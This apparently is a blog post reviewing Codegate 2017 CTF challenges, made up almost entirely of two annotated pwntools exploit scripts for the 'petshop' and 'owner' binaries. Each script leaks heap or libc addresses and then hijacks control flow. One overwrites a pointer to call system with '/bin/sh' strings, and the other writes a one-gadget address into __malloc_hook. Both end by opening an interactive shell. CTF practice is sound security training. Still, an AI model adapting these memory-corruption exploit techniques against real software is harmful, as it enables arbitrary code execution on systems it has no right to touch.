
codegate 2017 review

Cdor1 2018. 1. 29. 22:51

petshop


from pwn import *  # pwntools (process, p64/u64, log); the star-import is the usual pwntools idiom
s = process('./petshop')  # spawn the local target binary; every helper below drives this global session
raw_input()  # block until Enter is pressed -- presumably a pause to attach a debugger first; verify

def buy(select):
    """Menu option 1 ("buy"): answer the two `select:` prompts with 1 and `select`.

    Each prompt the binary prints is echoed to stdout before it is answered.
    `select` goes through str(), so ints and strings are both accepted.
    """
    first_prompt = s.recvuntil('select:\n')
    print(first_prompt)
    s.sendline('1')
    second_prompt = s.recvuntil('select:\n')
    print(second_prompt)
    s.sendline(str(select))

def sell():
    """Menu option 2 ("sell"): echo the `select:` prompt and answer 2; nothing else is sent."""
    prompt = s.recvuntil('select:\n')
    print(prompt)
    s.sendline('2')

def sound(select):
    """Menu option 3 ("sound"): answer `select:` with 3, then `select for sound:` with `select`.

    Every prompt is echoed to stdout before the reply is written.
    """
    exchanges = (
        ('select:\n', '3'),
        ('select for sound:\n', str(select)),
    )
    for prompt, answer in exchanges:
        print(s.recvuntil(prompt))
        s.sendline(answer)

def set_pet(select, name, sound, feed):
    """Menu option 4 ("set"): pick pet `select`, then send `name`, `sound` and `feed` at their prompts.

    Only `select` is passed through str(); the three fields are sent verbatim,
    so callers hand in strings or packed bytes. The `sound` parameter shadows
    the module-level sound() helper inside this body only, which never needs it.
    """
    dialogue = [
        ('select:\n', '4'),
        ('select for set:\n', str(select)),
        ('name:\n', name),
        ('sound:\n', sound),
        ('feed:\n', feed),
    ]
    for prompt, answer in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(answer)

def list():
    """Menu option 5 ("list"): echo the `select:` prompt and answer 5.

    NOTE: this shadows the builtin list() for the rest of the module; the name
    is kept because the driver code below calls it as such.
    """
    prompt = s.recvuntil('select:\n')
    print(prompt)
    s.sendline('5')

def set_name(name):
    """Menu option 6: answer `select:` with 6, then send `name` verbatim at the name prompt."""
    exchanges = (
        ('select:\n', '6'),
        ("What's your name?\n", name),
    )
    for prompt, answer in exchanges:
        print(s.recvuntil(prompt))
        s.sendline(answer)

buy(1)  # menu 1, slot 1
set_name('dddd')  # menu 6
# Menu 4 on slot 1.  The feed field is 12 filler bytes, the packed 64-bit
# constant 0x604088 and one 0x10 byte; how the binary lays out / consumes that
# field is not shown on this page (0x604088 looks like a fixed, non-PIE
# address -- unverified here).
set_pet(1, 'aaaa', 'bbbb', 'c'*12 + p64(0x604088) + '\x10')
list()  # menu 5; its output is what the next two lines parse
print s.recvuntil('person:')
# Six raw bytes after 'person:' are zero-extended to 8 and decoded
# little-endian; the script treats the value as a pointer into libc.
libc_leak = u64(s.recv(6).ljust(8, '\x00'))
# The three offsets are hard-coded for one specific libc build (not named on
# the page) and will not transfer to another build -- TODO confirm which libc.
libc_base = libc_leak - 0xa59d0
oneshot = libc_base + 0xf1147  # computed and logged, but never used below
system = libc_base + 0x45390
log.info('libc : ' + hex(libc_leak))
log.info('libc_base : ' + hex(libc_base))
log.info('oneshot : ' + hex(oneshot))

buy(1)  # second pet, again slot 1
# Menu 4 on slot 2: name and sound are ';/bin/sh;', feed repeats the earlier
# 12 + 8 + 1 byte prefix and appends 0x10 copies of '/bin/sh;' (0x80 bytes).
set_pet(2, ';/bin/sh;', ';/bin/sh;', 'c'*12 + p64(0x604088) + '\x10' + '/bin/sh;'*0x10)

# Menu 6 with the first 7 of the 8 packed bytes of `system`; why the top byte
# is dropped is not stated (presumably a length limit on the name field --
# verify against the binary).
set_name(p64(system)[:-1])

s.interactive()  # hand the session over to the terminal


owner


from pwn import *  # pwntools (process, p64, log); the star-import is the usual pwntools idiom
s = process('./owner')  # spawn the local target binary; every helper below drives this global session

def go_back():
    """Drain up to 4096 bytes of pending output, echo it, then send -1 (the "back" choice).

    Unlike the other helpers this waits for no specific prompt, so the echoed
    text is whatever happened to be buffered at the time.
    """
    pending = s.recv(4096)
    print(pending)
    s.sendline('-1')

def add_apart(name, floor, house, something):
    """Menu option 1: create an apartment, answering the four follow-up prompts in order.

    `floor` and `house` go through str(); `name` and `something` are sent
    verbatim. Each prompt is echoed to stdout before it is answered.
    """
    dialogue = (
        ('> ', '1'),
        ("What is your apartment's name? \n", name),
        ('How many floor on your apartment? ', str(floor)),
        ('How many house in each floor? ', str(house)),
        ('Describe something about it :', something),
    )
    for prompt, answer in dialogue:
        print(s.recvuntil(prompt))
        s.sendline(answer)

def edit(select1, select2, modify_select=0, new=0, flag=0): # -1 -1 -1
    """Menu 4 -> 1: navigate to item (select1, select2); with `flag` set, also write `new` into field `modify_select`.

    Every prompt on this path is '> '.  When `flag` is truthy one more '> '
    prompt is answered with str(modify_select), then a single recv() is
    drained (no prompt text is awaited) and `new` is sent verbatim -- so a
    caller setting `flag` must pass a string for `new`; the default 0 is not
    usable in that case.  The "-1 -1 -1" note on the def line presumably
    records how many go_back() calls return to the top menu (the driver below
    issues three after each call).
    """
    for answer in ('4', '1', str(select1), str(select2)):
        print(s.recvuntil('> '))
        s.sendline(answer)
    if not flag:
        return
    print(s.recvuntil('> '))
    s.sendline(str(modify_select))
    print(s.recv())
    s.sendline(new)

def change(select1, select2, select3): # -1 -1
    """Menu 4 -> 2: answer five consecutive '> ' prompts with 4, 2, select1, select2, select3.

    The three selections go through str().  The "-1 -1" note presumably records
    the two go_back() calls needed afterwards (the driver below issues two).
    """
    answers = ('4', '2', str(select1), str(select2), str(select3))
    for answer in answers:
        print(s.recvuntil('> '))
        s.sendline(answer)

add_apart('1234', '1234', '1234', '1234')  # two apartments with identical fields
add_apart('1234', '1234', '1234', '1234')
change(1, 1, 2)  # menu 4 -> 2 with choices 1, 1, 2
go_back()  # two backs after change() (matches its "# -1 -1" note)
go_back()
edit(3, 1)  # menu 4 -> 1, choices 3, 1; no modification (flag defaults to 0)
print s.recvuntil('Normal price of menu : ')
# The "price" is read as 14 decimal characters and treated as a heap address;
# 0x12cf0 is a fixed distance to the heap start for this binary/run (not
# derivable from the page -- TODO confirm).  heap_base is only logged below.
heap_leak = int(s.recv(14))
heap_base = heap_leak - 0x12cf0
log.info('heap_leak : ' + hex(heap_leak))
log.info('heap_base : ' + hex(heap_base))

go_back()  # three backs after edit() (matches its "# -1 -1 -1" note)
go_back()
go_back()

edit(1, 1, 1, 'a'*0x100, 1)  # modify field 1 of item (1,1) with 0x100 bytes of 'a'
go_back()
go_back()
go_back()
change(1, 1 ,2)  # same change as above (the stray space before ',2' is harmless)
go_back()
go_back()
edit(3, 2)  # menu 4 -> 1, choices 3, 2; no modification
print s.recvuntil('Normal price of menu : ')
# Second "price" read: 15 decimal characters, treated as a libc pointer.
# 0x3c4b78 / 0x3c4b10 / 0xf02a4 are offsets for one specific libc build (not
# named on the page) and will not match another build -- TODO confirm which.
libc_leak = int(s.recv(15))
libc_base = libc_leak - 0x3c4b78
malloc_hook = libc_base + 0x3c4b10
oneshot = libc_base + 0xf02a4
log.info('libc_leak : ' + hex(libc_leak))
log.info('libc_base : ' + hex(libc_base))
go_back()
go_back()
go_back()
# Field 6 of item (3,1) receives malloc_hook as a decimal string (the str()
# suggests the binary parses that field as a number -- unverified here).
edit(3, 1, 6, str(malloc_hook), 1)
go_back()
go_back()
go_back()
# Field 1 of item (1,1) receives the packed 8-byte oneshot value verbatim.
edit(1, 1, 1, p64(oneshot), 1)
go_back()
go_back()
go_back()
s.sendline('5')  # top-level menu 5; what it does is not shown on this page
s.interactive()  # hand the session over to the terminal

